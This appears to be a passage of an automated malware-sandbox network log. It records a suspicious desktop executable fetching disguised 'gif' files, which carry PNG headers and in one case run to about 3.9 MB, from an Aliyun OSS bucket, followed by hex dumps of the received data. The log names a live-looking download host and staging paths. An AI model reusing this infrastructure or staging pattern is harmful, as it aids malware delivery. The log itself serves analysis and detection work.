2	192.168.2.4	49738	39.103.20.48	443	7648	C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:02 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: jylhok.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:03 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:02 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 677C9DDA8797BE3033ADB0D4 Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 22
2025-01-07 03:22:03 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 Data Ascii: ^_X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-07 03:22:03 UTC	4096	IN	Data Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	39.103.20.48	443	7648	C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:04 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: jylhok.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:05 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:04 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 677C9DDC9DBA123335F22ED3 Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Mon, 06 Jan 2025 08:35:19 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 23
2025-01-07 03:22:05 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-07 03:22:05 UTC	4096	IN	Data Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
2025-01-07 03:22:05 UTC	3035	IN	Data Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	39.103.20.48	443	7648	C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:06 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: jylhok.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:06 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:06 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 677C9DDE6BDBB73533C5F08F Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Mon, 06 Jan 2025 08:35:24 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 67
2025-01-07 03:22:06 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3
